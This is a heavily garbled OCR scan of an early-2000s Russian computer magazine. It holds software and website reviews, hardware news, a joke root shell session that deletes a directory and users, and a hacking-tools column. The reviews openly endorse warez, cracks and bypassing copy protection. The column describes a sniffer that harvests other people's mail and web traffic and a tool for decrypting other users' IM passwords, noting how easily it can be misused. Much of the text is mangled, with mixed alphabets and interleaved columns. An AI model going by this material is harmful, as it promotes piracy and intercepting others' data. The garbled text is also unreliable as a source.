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INTRO 


localhost login: root 
Password: 


[root@localhost root]# su nOah 
Password: 


[nOah@localhost пОаВ]$ cd / 

[nOah@localhost /]$ rm -rf ./spez 
[nOah@localhost /]$ userdel donor dronich dr.cod 
[nOah@localhost /]$ groupdel spez-crew 
[nOah@localhost /]$ mkdir ./spez 
[nOah@localhost /]$ exit 

exit 

[root@localhost root]# userdel nOah 
[root@localhost root]# exit 


localhost login: 
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HOBOCTM/SOFT | Be ae ! 


едавно прикупил себе DVD, 

теперь занимаюсь поисками 

хорошего плеера. А тут как 
раз обновился PowerDVD. Интер- 
фейс стал еще приятнее: изменилась 
шкурка по умолчанию и добавилась 
возможность менять скины. Отлич- 
ное качество изображения: плеер 
сам подстраивает параметры видео, 
оптимизирует гамму для LCD мони- 
ков. Умная система преобразования 
сфрорматов помогает 16:9 фильмам хо- 
рошо смотреться на обычном экране, 
а 4:3 фильмам - на широкосформат- 
ном экране. В наличии разделение 
каналов для мультиканальных сис- 
тем, и, наоборот, реализованы вирту- 
альные каналы для двухканальных 
систем. Ну и до кучи: поддержка раз- 
личных типов файлов, в том числе и 
DivX, возможность делать скриншо- 
ты с фильма (весьма приятного каче- 
ства). Минусы: тяжеловат он все-таки 
для плеера, да и далеко не беспла- 


тен. А с учетом того, что стандартный 
Windows Media умеет неплохо проиг- 
рывать DVD (да и в целом девятая 
версия - ничего), желание искать 
PowerDVD по варезным сайтам мо- 
жет и пропасть :). У меня не пропало. 
Сделали бы в нем настроек поболь- 
ше - было бы просто супер. Найду че- 
го получше - сообщу :) 


Yoook 13 [низок Зав 


айти удобную читалку в наше 

время - большая проблема. 

Читать из ворда или ослика - 
развлечение для извращенцев. Рас- 
печатывать - бумаги не напасешься, 
да и не очень-то удобно носить с со- 
бой кипу листов. Что нужно от хоро- 
шей читалки? Чтобы хранила список 
книг и закладки позволяла делать, 
дабы скролить каждую минуту не 
приходилось; чтобы шрисфрт был круп- 
ный, сглаженный и читабельный; что- 
бы текст удобно форматировала. К 
сожалению, я идеальной читалки не 
знаю. Но вот в Ybook хотя бы присут- 
ствуют последние два пункта. Текст 
она разбивает просто отлично (пара- 
метры можно и настроить), со шриф- 
том все тоже супер. Читать удобно, и 
глаза не сильно устают. Жаль только, 
что не умеет прога сохранять отфор- 
матированные книги - приходится 
каждый раз ждать несколько секунд 
при открытии сфайла. И закладки де- 
лать нельзя (в виде исключения 
программа запоминает, на каком мес- 
те ты закончил читать). Зато прикру- 


тили возможность поиска и быстрой 
скачки книг с Gutenberg project (goc- 
таточно большая библиотека... на 
английском :)). Лучше бы все же сде- 
лали закладки. На сайте производи- 
теля есть другие проги для работы с 
электронными книгами, Ybook же 
идет к ним как бесплатное дополне- 
ние. Я надеюсь, что в новых версиях 
эта читалка станет полноценной про- 
гой (можно и платной :)), а пока что 
буду пользоваться Bookshelf. 


Flashkeeper 3.0 


огласись, дефолтный флэш- 

плеер от Macromedia - это 

просто убожество. Обыч- 
ный плагин для браузера, гордо 
именующий себя плеером. А я хо- 
чу полноценный, с прокруткой, 
регулировкой громкости, плей- 
листом и другими стандартными 
фишками. Все это и многое gpy- 
roe есть во Flashkeeper. Прога 
состоит из двух частей: Henocpeg- 
ственно плеера и оболочки (похо- 
же на оболочки ACDSee и других 
подобных программ - слева папки, 
справа файлы, внизу сама флэш- 
ка). Прога может конвертировать 
ехе-слэшки в Swf и наоборот, сни- 
мать и ставить защиту на файлы, 
делать скриншоты, составлять свои 
скринсейверы. Кроме того, в проге 
есть менеджер скачки сфлэшек, ко- 
торый вызывается из оболочки или 
в ослике по команде контекстного 
меню "Get Flash by Flashkeeper". 
Итак, если ты любишь слэш, TO это 
прога из разряда must have. Hy а 
еще must have кряк :) 


PhaseOut 5 1.78 mb 


у что тут сказать, самый краси- 

вый браузер, который я когда- 

либо видел. Да что браузер! 
Просто одна из самых красивых прог! 
Простая идея: а почему бы нам не ис- 
пользовать в качестве скинов флэш? 
Весить они будут немного, делать их не 
так уж и сложно, зато у нас будет пол- 
ностью изменяемый интерсрейс, где все 
менюшки будут двигаться, красиво вы- 
падать и раскрываться, кнопочки будут 


вдавливаться и еще будет много похо- 
жей шняги :). Причем памяти это чудо 
кушает не так уж и много по сравнению 
с другими браузерами на основе осли- 
ка: приблизительно 10 мегов, как и 
MylE2, например. Были бы еще и функ- 
ции на уровне - и вот оно, счастье :). А 
еще жаль, что скинов маловато. Hage- 
юсь, это временно, тем более что в 
комплекте есть тестер для собственных 
скинов и редактор языка интерфейса. 


раде (У? 


ПЕ ony 200s | 


упер прога! Must have gna лю- 

бого офисного работника :). 

Функция простая: по нажа- 
тию хоткея убирать с экрана окна в 
никуда, скрывая панель задач, трей 
и рабочий стол. Ну и, естественно, 
сама прога тоже не светится. В отли- 
чие от других прог подобного плана 
скрываемые окна можно выбирать. 
В настройках есть два дополнитель- 
ных пункта: неубираемые окна (за- 
гоняем сюда офисные проги) и окно, 
которое будет поверх других (а если 
не будет такого окна - соответствую- 
щая прога запустится). А еще после 
нажатия хоткея могут смениться 
уровень звука и разрешение экрана 
(а вот зачем это нужно, я так и не по- 
нял). Между прочим, среди рекламы 
на сайте на первом месте стоит та- 
кое заявление (перевожу): не дайте 
своему боссу или жене поймать вас 
за просмотром порнухи :). А некото- 
рых всего-то за открытую аську хо- 
тели уволить :) 


[бе 2.6 | www.outertech.com]05mb 
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лин, HY за что все так любят 

эту прогу?! Ну да, малень- 

кая, шустрая, никакой рек- 
ламы, абсолютно бесплатная. Под- 
держивает кучу протоколов: ICQ, 
AIM, MSN Messenger, IRC, Jabber (и 
еще много других, вплоть go 
Ме 5епа). Даже поддержка скинов 
есть (хотя при такой невзрачной 
внешности капитально ничего по- 
менять нельзя :)). Туча плагинов, 
расширяющих функциональность 
проги (а то без них она ни фига не 
умеет :)). А еще за ее использова- 
ние можно получить респект от 
Дронича :). A яею все равно поль- 
зоваться не буду! Меня ломает ис- 
кать нужные плагины, а некото- 
рых функций очень не хватает, и 
Miranda все же слишком убого 
выглядит. Вот если Trillian 2.0 ока- 
жется отстоем (в чем я сомнева- 
юсь), тогда может и подумаю о пе- 
pexoge :) 


Те 


Г. 


che 
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 оофоооое 


loneCD - не самая новая про- 

га (в этом году еще не об- 

новлялась), но узнал я о 
ней недавно :). Существует много 
программ для записи дисков. Есть 
сложные и многофункциональные, 
есть простые и специализирован- 
ные. CloneCD предназначена для 
одной простой функции - копиро- 
вать диски один в один. Простой и 
удобный русский интерфейс, быст- 
рота, возможность создавать об- 
разы дисков, наличие собственно- 
го виртуального CD - уже за это 
программу можно полюбить. Но са- 
мое главное - CloneCD умеет обхо- 
дить практически любую защиту 
от копирования. Конечно, это тре- 
бует некоторой подготовки: как 
минимум нужно включить CloneCD 
Тгау и не закрывать самому лоток 
CD (CloneCD сам его закроет, при 
этом не даст Виндам распознать 


диск), а потом правильно выбрать 
тип диска. Но еще лучше будет 
зайти =Ha \ммм.сопу.зтокегз- 
board.de и скачать ClonyXXL (npo- 
ra, определяющая тип защиты Ha 
диске и передающая параметры в 
CloneCD) и Profiler (прога co спис- 
ком готовых профилей CloneCD 
для многих типов защиты от копи- 
рования). С этой связкой ни одна 
защита не устоит! 


И т 


идел хоть раз файлы с расши- 

рениями diz и nfo? File_id.diz - 

такой сфайлик почти всегда ле- 
жит на ЕТР или в архивах с прогой и 
содержит краткое описание ее ‹фай- 
лов. А текстовики с расширением nfo 
практически всегда идут вместе с 
кряками, кейгенами и варезом. В них, 
как правило, есть полезная информа- 
ция по установке, какие-нибудь тип- 
сы, иногда ключи. Только вот основ- 
ную часть nfo занимает ASCIl-rpacpu- 
ка с логотипом группы, куча респек- 


тов, благодарностей, подписи ребят, 
работавших над релизом, и прочая 
лабуда. Читать эти файлы в блокноте 
не слишком удобно. GetDiz - это спе- 
циальный вьюер для таких файлов. 
Он преобразует А$ЗС!-графику так, 
что она не мешает просмотру, умень- 
шает шрисфты и выделяет некоторые 
ключевые слова (serial, key, адреса 
www и e-mail, etc). Всем любителям 
вареза настоятельно рекомендую к 
установке. 
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MAMA С ПЫЛУ С ЖАРУ 


$! выпустила новую матери- 
М нскую плату, основанную на 

чипсете VIA KT600, MSI KT6 
Delta. Новинка предназначена для 
процессоров AMD Athlon XP, noggep- 
живает 400 МГц FSB, имеет 3 слота 
для установки памяти 0068400 
(PC3200), DDR333 (PC2700) и 
DDR266 (PC2100). Плата поддержи- 
вает функцию защиты процессора 
от перегрева и выхода из строя (в 
случае перегрева или неисправнос- 
тей системы охлаждения) - Thermal 
Diode Circuit. На плате установлен 
Promise RAID контроллер. В комп- 
лекте с платой идут удлиненные 


Serial АТА кабели, утилиты Live 
Update 2 и CoreCenter, предназна- 
ченные для управления и настройки 
платы. Также поддерживаются фир- 
менные технологии: Speedster, npeg- 
назначенная для разгона системы; 
функция регулировки питания памя- 
ти с шагом всего 0,05В; технология 
BuzzFree, позволяющая снизить 
шум работающего компьютера; 
функция PowerPro, предназначен- 
ная для управления питанием, и 
функция LifePro, призванная npog- 
лить срок службы процессора и ма- 
теринской платы. 


Новенькая мама для AMD Athlon XP 


СВЕЖЕЕ LCD 


омпания АШес начала вы- 
К пуск двух новых LCD монито- 

ров. Это AD-DAI7Y и AD- 
ААТТУ. Новинки имеют размер экра- 
на 17 дюймов и разрешение 
1280x1024. Модель AD-DAI7Y осна- 
щена D-Sub и DVI-D, а модель AD- 
AAITY - только D-Sub. Оба девайса 
обладают схожими характеристика- 
ми: яркость - 300 кд, контрастность - 
3501, размер зерна - 0,264 мм. Угол 
обзора по горизонтали - 160°, по 
вертикали - 135°, время отклика 25 
мс. Размеры: 372 x 210 x 384 мм, вес 
5,5 кг. Обе модели имеют встроен- 
ные 1Вт колонки. Мониторы будут 


выпускаться в двух вариантах: в бе- 
лом корпусе и в черном корпусе. 
Ожидаемая стоимость моделей: 
481$ - АБ-БАТТУ и 447$ - AD-AATTY. 


И СНОВА КОМБАЙН 


TI Technologies начала пос- 
A новой мультимедий- 

ной карты ALL-IN-WONDER 
9800 PRO. Новинка основана на 
чипе Radeon 9800 PRO, а также ос- 
нащена чипом АТ! THEATER 200 и 
128 Мбайт 256 Бит DDR памяти. 
Частота чипа - 380 МГц, памяти - 
340 МГц. Плата имеет ТВ тюнер с 
поддержкой стерео и возмож- 
ностью сохранения 125 каналов. 
Есть возможность захвата анало- 
гового изображения в МРЕС-2 с 
разрешением 720 x 480 и 30 fps. 
На видеоадаптере также имеется 


видеовыход, поддерживающий 
НОТУ. В комплекте с картой постав- 
ляется пульт дистанционного уп- 
равления (REMOTE WONDER), все- 
возможные утилиты для работы с 
видео: TV-ON-DEMAND PVR, EAZY- 
LOOK, VIDEOSOAP, THRUVIEW, 
VIDEOSOAP MULTVIEW. Новинка 
полностью поддерживает техноло- 
гии DirectX 9.0 и OpenGL и опера- 
ционные системы Windows 
XP/2000/Me/98/98 SE. На карту 
дается трехлетняя гарантия. Ожи- 
даемая стоимость девайса состав- 
ляет 4495$. 


Чудесное ALL-IN-WONDER 9800 PRO 
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УНИВЕРСАЛЬНЫЕ КПК 


омпания Mitac официально 
К объявила о начале продаж 
двух новых карманных ПК. 
Это Мю 339 и Мю 558. Модель Мю 
339 ориентирована на молодежь и 
сочетает в себе функции MP3-nne- 
ера, РРА, а также в нем установле- 
на встроенная цифровая камера. 
Новинка основана на процессоре 
Intel РХА255 с тактовой частотой 
400 МГц и работает с операцион- 
ной системой Microsoft Windows 
Mobile 2003. Модель Мю 558 - бо- 
лее серьезное устройство: она 
имеет возможность работы в бесп- 
роводных сетях Bluetooth и 802.16 
с поддержкой VoIP (voice over IP) и 
ориентирована на корпоративных 
служащих. Этот КПК оснащен про- 
цессором Intel PXA263 с тактовой 
частотой 400 МГц и работает с 
операционной системой Microsoft 
Windows Mobile 2003. Новинка 
поддерживает флэш-память стан- 
gapta Compact Flash (CF) И CF и SD 
Ио MMC Secure Digital. В рознич- 
ную продажу оба девайса попадут 
в середине июля. Примерная стои- 
мость составляет 315$ за Мю 339 и 
480$ - за Мю 558. 


серьезных 


КПК для веселых и 


АМО"ШНАЯ МАТЬ OT GIGABYTE 


омпания Gigabyte тоже npegc- 
К тавила новую модель матери- 

нской платы на связке VIA 
KT600 + VT8237, предназначенную 
для процессоров AMD AthlonXP, име- 
ющих 400 МГц FSB, при этом пропу- 
скная способность чипсета достигает 
3.2 Гбайт. Новинка имеет контроллер 
памяти DDR400 FastStream64 и но- 
вейший интерфейс АСРЭХ. Bo встро- 
енном контроллере Serial АТА реали- 
зованы Kak SATA, так и КАЮ-функ- 
ции. Контроллер поддерживает нес- 
колько режимов RAID: RAID О (чере- 
дование данных) и RAID 1 (зеркалиро- 
вание), предназначенное как для 
увеличения скорости дисковой сис- 
темы, так и для более надежного хра- 
нения данных. На плате установлено 
8 портов USB 2.0. Четыре из них на- 
ходятся сзади на системном блоке, а 
остальные 4 порта подключаются к 
плате кабелем. Также поддерживает- 
ся интерфейс IEEE1394. 
На плате установлена шестиканаль- 
ная звуковая система, поддерживаю- 
щая функцию Jack-Sensing, которая 
предназначена для того, чтобы помо- 
гать пользователю подключать ау- 
диоустройства. Кроме того, на плату 
установлена 10/100 Мбит/с Ethernet 
сетевая карта. 
В комплект входят традиционные 
утилиты: Xpress Install, Xpress 
Recovenry, EasyTune4, @BIOS, Q- 
Flash. В виде бонуса с матерью пос- 


— $ 
J 
=> 


ghia Чт 
Cake а д-ь 


= 
ae 


т 


Новая плата nog AMD от Gigabyte 


тавляется довольно внушительный 
пакет ПО: Norton Internet Security, 
Norton Anti Virus, Norton Personal 
Firewall, Norton Privacy Control, 
Norton Parental Control, Norton Spam 
Alert, GIGABYTE Windows Utility 
Manager, Adobe Acrobat Reader. 

Вот краткая спецификация 

новой платы: 

форм-фактор - ATX; 

чипсетная связка - VIA KT600 + VIA 
VT8237 (возможны варианты с юж- 


ным мостом VT8235); 

поддержка Socket А процессоров 
AMD Athlon XP/Athlon/Duron с 
400/333/266/200 МГц FSB; 

память: три слота, go 3 Гбайт 
PC3200/PC2700/PC2100; 

слот AGP 8X/4x; 

пять слотов PCI; 

шестиканальный аудио кодек АС97 
(Realtek ALC655); 

восемь портов USB 2.0. 


омпания SAMSUNG изобрела 
К новую гарантийную схему. 

Допустим, ты купил себе си- 
9юк SAMSUNG — SC-152AEB,SC- 
152A/SER; SC-152LEB или SC-152G у 
официального дистрибьютора, a OH Y 
тебя сломался. Ты несешь его в сер- 
висный центр до первого декабря 
этого года, тебе его естественно ме- 
няют либо чинят. Но это не все - в ка- 
честве возмещения морального 


ущерба, SAMSUNG дарит тебе еще 
один новый привод. То есть у тебя 
был один нерабочий CD-npuBog, a Te- 
перь два рабочих - круто! Только не 
спеши ломать свой сидюк, ведь та- 
кая гарантия действует только на те 
приводы, в поломке которых виноват 
производитель. Если ты развинтишь 
устройство, вскроешь крышку, или 
просто расфигачешь его кувалдой 
никто тебе ничего не заменит! 


Расфигачь СБ’юк! 


омпания Creative выпустила 
К. новые видеокарты класса 

hi-end. Речь идет о моделях 3D 
Blaster 5 FX 5900 Ultra и 3D Blaster 5 
FX 5600 Ultra. Kapta 3D Blaster 5 FX 
5900 Ultra предназначена прежде 
всего для новейших игр с использова- 
нием самых современных технологий. 
Новинка обрабатывает до 338 милли- 
онов треугольников в секунду при 
скорости заполнения сцены 3,6 мил- 
лиарда текселей в секунду. Частота 
чипа составляет 450 МГц, частота па- 
мяти - 850 МГц. Адаптер поддержива- 
ет DirectX 9.0 и АСР 8X, а также техно- 


логии CineFX 2.0, Intellisample НСТ и 
многоэкранные режимы nView. 

Карта 3D Blaster 5 FX 5600 Ultra ocHo- 
вана Ha GeForceFX 5600 GPU. Такто- 
вая частота ядра составляет 400 МГц, 
частота памяти - 8 OO МГц, RAMDAC 
400 МГЦ. Эта модель обрабатывает go 
100 миллионов треугольников в се- 
KYHQY при скорости заполнения сцены 
1,6 миллиарда текселей в секунду. Так- 
же в полной мере поддерживаются 
DirectX 9.0, AGP 8X, CineFX 2.0, 
Intellisample НСТ и многоэкранные pe- 
жимы п\е\м. Ориентировочная цена 
карты 3D Blaster Geforce FX 5600 Ultra 


+ 


BLASTOR 


Хайтечные Blaster'b! от Creative 


составит 220$, а цена 3D Blaster 
Geforce FX 5900 Ultra достигнет 400$. 
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ороший ресурс, посвящен- 

ный всему, что связано с 

компьютерными играми. 
На сайте можно найти новости 
разработчиков игр (Бука, Руссо- 
бит-М, ММС), всяческий "прилага- 
ющийся софт" (демо-версии, 
трейнеры, патчи), коды к недоку- 
ментированным фичам, прохож- 
дения квестов, скриншоты новых 
игр и так далее... 
Имеются ссылки на новые и ста- 
рые версии игр, На$В-игры, фри- 
варные игры. 
Особое внимание уделено "об- 
ратной связи": в наличии форум, 
гостевая, чат. 


http://free-help-internet.com 


е достали еще чайники 

своими вопросами в сти- 

ле "а вот чего нажать, 
чтоб заработало"? Теперь суще- 
ствует реальное спасение от них! 
Пошли их... на сайт free-help- 
internet.com! Просто, четко, "че- 
ловеческим" языком авторы на- 
писали обо всем, что касается 
Инета: браузеры, поиск инфы, 
ICQ и аналоги, электронная поч- 
та, оплата через Интернет, безо- 
пасность в сети, ОСы и так далее! 
Сайт довольно новый, но ундер- 
констракшнов не видно, наполне- 
ние отличное. Есть форум и ГАО. 
Супер! В закладки... 
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тличный информационный 

сайт в помощь системному ag- 

министратору! Сайт довольно 
новый, но на наполнение жаловать- 
ся грех... Тут есть все, что может по- 
надобиться в работе сисадмину. 
Инструкции, описания и справочная 
информация по-русски и по-английс- 
ки по установке и настройке Windows 
2000, Windows 2003(!), Exchange 
2000 и т.п. 
Помимо этого, на сайте есть раздел 
новостей из мира Интернет, высоких 
технологий и сетевой безопасности, 
причем часто обновляемый. 
Для облегчения "бумажной" работы 
сисадмина на сайте выложена раз- 
ная официальная информация: за- 


родолжаем тему игр. Этот 
сайт для тех, кто не излечил- 
ся от ностальгии по старым 
добрым приставочным играм. Здесь 
можно скачать эмуляторы лучших 
приставочных игр для компа. 
Если для тебя слова Sony Playstation, 
Nintendo, Sega и GameBoy что-ни- 
будь значат - этот сайт для тебя. 
Игр на сайте очень много (около 
двух тысяч), везде, как правило, 
представлены полные версии игр, 
скачиваются бесплатно и на хоро- 
шей скорости. Что еще надо для 
счастья? ;-) 
На этом месте уже можно распла- 
каться и со словами "Ax, Super 


_Сисадмину на заметку! | 


KOH 0б информации, документы 
ФАПСИ, нормативные документы, со- 
ответствующие ГОСТЫ ит.д. 

Очень удобная сфишка на сайте - по 
введенному номеру порта TCP/IP вы- 
водится информация о порте и о TOM, 
какие трояны его используют. 


_ Приставочные игры Ha ПК 


Mario!" бежать на сайт. ;-) Но мы еще 
заметим, что на сайте есть некото- 
рое количество солюшенов к играм 
и Тор20 самых скачиваемых игр по 
каждой приставке в отдельности. 


а сайте Glossword.ru собрано 

большое количество разно- 

образных словарей - как тол- 
ковых, так и обычных, для перевода. 
Словари структурированы по тема- 
тикам: компьютеры, культура и ис- 
кусство, сленг, экономика, справоч- 
ники по автомобилям, почтовым ин- 
дексам, телефонам, а также специа- 
лизированные словари. Отдельно 
вынесены переводчики с редких 
языков на английский. Представле- 
ны такие сложные и редко исполь- 
зуемые языки, как армянский, ки- 
тайский, греческий, финский, ирлан- 
дский и т.д. 
По всем представленным словарям 
возможен поиск, большое количест- 
во из них представляет собой энцик- 
лопедическую ценность. Возможен 


http://www.glossword.ru/catalog 


ta 


_ Масса словарей в одном флаконе 


поиск слова или словосочетания во 
всех словарях одновременно. 
Словари обновляются. Авторами 
сайта разработана специальная 
программа для создания онлайно- 
вых словарей, энциклопедий, спра- 
вочников. Кстати, она бесплатна и 
доступна для скачивания. 


http://slo htt 


равнительно недавно поя- 


вившийся, но подающий 

надежды сайт. Он постоян- 
но обновляется и содержит пря- 
мые линки на самый свежий сост. 
Отличает сайт от аналогов допол- 
нительные (кому как, некоторым - 
основные) разделы. Документация 
по основным темам: программиро- 
вание, веб-дизайн, железо, связь, 
софт, операционки, сети, игры. 
Несколько форумов по темам: ос- 
новной форум, софт, дизайн, же- 
лезо, игры. Особо радует наличие 
раздела документации (много по 
HTML, XML и т.9.) и раздела, где 
ссылки на программы структуриро- 
ваны по виду софта. Это напоми- 


ЕТ 


та 


нает обзор подобных программ с 
прямыми линками. Есть обзор по 
архиваторам, антивирусным прог- 
раммам, браузерам, прогам по ра- 
боте с видео, аудио, сетями. 


http://www.credcard.ru 


тличный ресурс, посвящен- 

ный всем видам пластико- 

вых карточек. Разделы - 
один другого краше... Особо следу- 
ет отметить "народный рейтинг" 
карточек, который определяется 
по субъективным мнениям посети- 
телей сайта. Там определяется да- 
же так называемый "индекс дове- 
рия" определенному банку. 
В разделе "Консультация" goxog- 
чиво разъяснено, как лучше выб- 
рать карточку и банк. Отдельный 
раздел посвящен интернет-плате- 
жам по пластиковым карточкам. 
ного информации, посвященной 
безопасности использования 
карт: что делать в случае утери 
карты, как защититься от злоу- 
мышленников. 
Интересно изложена история 
пластиковых карточек в России и 
в мире. Очень полезная фича - 
карта Москвы с указанием распо- 
ложения банкоматов, ресторанов 


и магазинов, принимающих кар- 
точки. Также есть карта метро с 
указанием банкоматов, располо- 
женных поблизости. В разделе 
ссылок также можно найти подоб- 
ный поиск по России, а также по- 
иск по виду карты (Visa, 
AmericanExpress и T.g.). 

При помощи специального серви- 
са возможно сравнение двух раз- 
личных карт по нескольким пара- 
метрам. Есть форум, ссылки на ре- 
сурсы подобной тематики. 


/www.nobat.ru 


умаю, уже все знают, Ka- 
кой у нас самый правиль- 
ный мейлер? ;-). Сайт сам 
по себе не новый, но для пользо- 
вателей TheBat лучше не бывает. 
О знаменитом мейлере здесь есть 
вся информация: как общие све- 
дения, которые полезны для начи- 
нающих пользователей, так и осо- 
бый раздел для npocpu. Особо сто- 
ит отметить раздел "Решение за- 
дач с использованием TheBat". 
Здесь по пунктам разъясняется, 
как решить определенную задачу 
или проблему в TheBat. Например 
- здесь написано о том, как заста- 
вить AVP проверять приходящую 
в TheBat почту; об автоматизации 
работы с рассылками. Отдельный 
раздел отведен взаимодействию 
TheBat с другими почтовыми прог- 
раммами, особенностям импорта и 
экспорта данных. 
Желающим еще чем-то улучшить 
и без того отличную программу 
полезно посетить раздел "Прог- 
раммирование для TheBat". Там 
предложены некоторые готовые 
решения для корректировки 
функций TheBat-a. 
После столь серьезных тем стоит 
заглянуть в раздел "Чай с лимо- 
ном", где находятся юмористичес- 
кие истории и рассказы, посвя- 
щенные TheBat, кодировкам и т.д. 
Сайт часто обновляется, есть 
своя рассылка новостей. 


“han 


равнительно новый, подаю- 
щий надежды софтовый ка- 
талог. Основные разделы 
софта, конечно, вполне угадывае- 
мы: Интернет, рабочий стол, утили- 
ты, игры, офис и т.д. Из особеннос- 
тей стоит отметить базу драйверов 
по модемам, сетевухам, звуковуш- 


кам, принтерам, BIOS. Последние 
поступления в базу софта отража- 
ются в виде новостей с прямым пе- 
реходом к страничке с линкой. Ве- 
дутся Тор1О наиболее скачиваемых 
программ за текущий день и за вре- 


мя существования сайта в целом. 
Радует возможность поиска не 
только по названию программы, аи 
по описанию, а также в конкретных 
подкаталогах. 

На сайте также размещаются 
новости разработчиков программ и 
другие материалы по безопасности 
систем, борьбе со спамом и т.д. На 
Goldsoft действует свой форум, 
планируется возможность заказа 
диска с программами 


Г овса) 2003 Пири 


НОВОСТИЛЛЕВ 


раде СЕ] 


AMAAITAG 1212345 


SPEZial DELIVERY 


HOBOCTW/HACKING TOOLS 7 | ® 


Имя: @1ме-Ме-Тоо 
Платформа: win 
Политика: shareware 


Весит: 394 Кб 
Веб: http://www.spyarsenal.com/ 


можно детально настроить фильтр, 
запретив или разрешив перехват 
трасфорика на уровне тех же файлов. 
То есть можно читать только почто- 
вые мессаги от Маши, к которым при- 


чередной правильный сниф-  аттачен JPG. Причем принимать мы dvanced Instant Messengers 
фер, сделанный нашими будем только Машины сотки, заби- Password Recovery - так выг- 
людьми. Его основное отличие вая на сам текст мессаг (если захотим, лядит полное название этой 
от общеизвестных монстров - просто- конечно). Еще одной приятной осо- софтины. Занимается она изъятием 
та :). Он не показывает дампы, не экс-  бенностью является то, что Give-Me- и декриптингом паролей, хранящих- 
портирует их в удобочитаемый фор- Too умеет работать с файлами tcp- ся в файлах прог для мгновенного 
мат - он просто формирует из полу- dump, которые можно получить на обмена сообщениями. Просмотрев 
ченных пакетов файлы, передавае- выходе почти любого другого сниф- ее выпадающую менюшку, я отме- 
мые по известным ему протоколам, и сфера. Так что если СМТ тебе чем-то Tun для себя два факта - на свете 
складывает в удобном виде в уста- не угодил, можешь использовать его есть еще много неизведанных ICQ- 
новленную gupy. Разбирается он в только в качестве удобного система- клиентов, а родная Миранда непри- 
HTTP, SMTP и POP3, то есть обеспечи-  тизатора перехваченных данных. касаема :). В плане мой пароль на 
вает твой винт постоянными поступ- аську так и не стал достоянием об- 
лениями чужих данных, передавае- щественности за полтора часа пере- 
мых через броузер, и не менее чужих бора на P4-1.6. Дальнейшее экспе- 
писем. Все перехваченные данные, риментирование было нагло прер- 
сформированные в файлы, склади- вано Донором со словами - "Да хва- 
руются в сложную структуру катало- тит уже, все равно не добудет!". Не 
гов типа "протокол \ номер интер- знаю, не знаю... В принципе, если ос- 
q@peiica \ айпишник \ хост \ MIME \ имя тавить этого монстрика на ночь, еще 
файла" для HTTP и "протокол \ номер неизвестно, чего он там нашифрует. 
интерфейса \ адрес отправителя \ ag- Так что, несмотря на то, что в хелпах 
рес получателя \ имя файла" gna черным по белому написано "you 
почтовых протоколов. В сниффере can't use this soft for cracking some- 
one's IM password", использовать 
его в роли декриптора чужих паро- 
лей до ужаса легко - достаточно д0- 
быть файл с зашифрованным паро- 
лем. А если ты не знаешь, как он на- 
зывается, AIMPR без проблем тебе 
это подскажет, достаточно выбрать 
в списке нужный клиент и посмот- 
то есть BW? BW есть очень по- реть, какой именно сфайл требуется 
лезная прога для работы с чу- для раскриптовки. 
жими компакт-дисками, поя- 
вившимися у тебя как законным, так и iL i 
незаконным путем. Лично у меня она pk lt epee 
оказалась третьей прогой, которая № __ ИЕ 
занимается CD-related деятель- ты, нетли на нем еще и аудиодорожек ——— = 
ностью. Для записи болванок и чте- - в общем, факты, которые ставили в ори 
ния сильно поцарапанных сидюков тупик любую другую читалку, здесь 
предназначена Мего. Для создания значения не имеют. Происходит 
на харде образа компактов, которые обычная побайтовая копия (обрати 
требуются для нормальной работы — внимание, не 150-образ, а именно не- 
игрушек (GTA:VC, Splinter Sell), ис- посредственный образ CD, с lead-in и 
пользуется CloneCD. А для мгновен-  |еад-ои®)с носителя на хард, после че- 
ного копирования любого диска на го эта копия сразу же записывается 
болванку служит BW. Причем ей абсо- на болванку. Или не записывается, а 
лютно наплевать, какая защита нало- откладывается на черный день - мало 
жена на диск, есть ли на нем копирай- ли что может случиться... 
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Что наша жизнь 
Gamez! 
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ЧТО НАША 


ЖИЗНЬ? GAMEZ! 


РУЛИМ КОМПЬЮТЕРНЫМ КЛУБОМ 


Kirion 
(kazarian@real.xakep.ru) 


то-что, говоришь, целый ме- 

сяц проработал админом в 

местном клубе, заработал 
бессонницу и недостачу на большую 
часть зарплаты? Ах, вообще выгнали за 
мошенничество :)? И больше ни за что не 
пойдешь работать в клуб? Ну, тогда мо- 
жешь дальше не читать :). 


РАБОТАЙТЕ, НЕГРЫ, РАБОТАЙТЕ 
Честно скажу, работа админа в игровом 
клубе - дело не из легких. Во-первых, но- 
вичку достаточно сложно быстро освоить 
работу с кассой и админской прогой, так 
что недостача поначалу появляется прак- 
тически у всех. Да и не только поначалу... 
Ближе к концу смены (особенно ночной) 
устаешь так, что ошибиться в чем-нибудь 
очень легко. Кстати, о сменах: в большин- 
стве клубов админы работают часов по 10, 
причем, как правило, работают одни - да- 
же в крупных клубах в зале редко есть 
второй админ или хотя бы кассир. А 
сколько головной боли могут доставить 
посетители. Например, толпа прогульщи- 
ков средней школы, у которых что-то глю- 
чит в контре. Или взрослые дяди, которые 
в третий раз в жизни работают за компь- 
ютером, но у них уже наполеоновские за- 
машки (я был свидетелем, как однажды 
такой дядя попросил админа сделать ему 
сайт :)). Ну и как финиш, достаточно низ- 
кая зарплата при высокой нагрузке. А все 
мысли о левом заработке стремительно 
улетучиваются при более плотном знако- 
мстве с системой управления клубом. 


КАПИТАН НА МОСТИКЕ! 

А называть ее стоит именно так: система 
управления клубом. Как правило, это пол- 
ноценная информационная система с ве- 
дением статистики и учета, кассовых опе- 
раций, ну и, конечно же, полным контро- 
лем над машинами и пользователями. Ес- 
ли чего-то не хватает - значит, ты имеешь 
дело с самопальным творением местного 
программера (а значит, есть реальный 
шанс все это похачить :)) или в твоем клу- 
бе меньше десяти машин :). Состоит систе- 
ма из нескольких частей: непосредственно 
сервер системы, админская консоль (обя- 
зательно с разными уровнями доступа), 
клиент, который устанавливается на всех 
машинах, и вспомогательная прога для ве- 
дения различной статистики. Хотя обе тул- 


зы можно реализовать в одной админской 
консоли, но я не советую так делать. Поче- 
му, расскажу чуть-чуть позже. 

Итак, вот приблизительный список функ- 
ций, которые должны быть реализованы в 
системе управления клубом. Первое и са- 
мое важное - это тотальный контроль над 
машинами. Это список процессов, которые 
запущены у пользователя; состояние кли- 
ента (а варуг особо умный игрок его выг- 
рузит); точный учет времени и Tpacpuka, 
возможность их быстрого изменения и 
отключения; возможность пересадить лю- 
дей с одного компа на другой с сохранени- 
ем данных об оплате; очень полезно иметь 
систему отсылки сообщений клиенту (чу- 
Bak, у тебя время через 5 минут заканчи- 
вается :)), админу (чел за пятым компом 
что-то странное делает, ты подойди, дай 
ему по башне :)). Причем все эти данные 
должны отображаться наглядно, чтобы ag- 
мин посмотрел один раз и уже знал, где 
машины заняты, где не работают, где ско- 
ро освободятся, е{с. И совсем хорошо, ес- 
